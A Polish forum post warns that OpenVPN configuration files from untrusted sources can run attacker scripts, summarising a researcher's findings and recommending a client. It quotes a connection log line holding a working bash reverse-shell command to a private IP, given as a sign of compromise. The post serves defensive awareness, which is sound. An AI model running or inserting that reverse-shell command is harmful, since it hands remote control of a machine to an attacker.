OpenVPN - nieznane pliki konfiguracyjne mogą być szkodliwe
#1
[Obrazek: 0*LJL9jYDk_FqQgiuH]

Połączenia VPN to jedno z bardziej znanych rozwiązań, która ma nam pomóc w zachowaniu prywatności w sieci, czasem pozwala też na zwiększenie bezpieczeństwa...jednym z bardziej znanych programów jest OpenVPN, który jest multisystemowym pakietem, z którego korzystają tysiące użytkowników na całym świecie. Na jego plikach konfiguracyjnych pracują też inne niezależne rozwiązania tego typu. Wydawać by się mogło, że nie powinno nam tu nic grozić, ale niestety jest inaczej - okazuje się, że publikowane przez różne źródła w sieci i pobierane potem przez użytkowników pliki konfiguracyjne tego pakietu mogą dobrym i skutecznym medium infekcji i przejęcia systemu.
Sprawę tę zanalizował badacz - Jacob Baines - który wykrył w plikach konfiguracyjnych (pliki z rozszerzeniem .opvpn) pobranych z niepewnych źródeł fragmenty kodu pozwalające na skuteczne zaatakowanie maszyny ofiary, która nieświadomie taki plik u siebie zainstalowała. Przykładowy fragment kodu...każdy może sobie właściwie go przeanalizować, bo można go podejrzeć w edytorze tekstu

Kod:
remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

Autor podaje również sposób, w jaki możemy sami zbadać jakość kodu takiego pliku konfiguracyjnego - trzeba sprawdzić plik loga z połączenia i poszukać wpisu/-ów jak niżej

Kod:
Thu Jun 7 12:28:23 2018 NOTE: the current — script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init
Oznacza on, że został użyty specjalny skrypt i zostało potem wykonane polecenie-czynność, co zostało  opisane w linijce niżej.
Badacz ponadto zaleca stosowanie bezpiecznego klienta OpnVPN pod nazwą Viscosity 
https://www.sparklabs.com/viscosity/

Źródła informacji i cytatów
https://www.bleepingcomputer.com/news/se...ere-s-why/
Artykuł macierzysty badacza
https://medium.com/tenable-techblog/reve...fd8b1d38da
"Bezpieczeństwo jest podróżą, a nie celem samym w sobie - to nie jest problem, który można rozwiązać raz na zawsze"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
Odpowiedz




Użytkownicy przeglądający ten wątek: 1 gości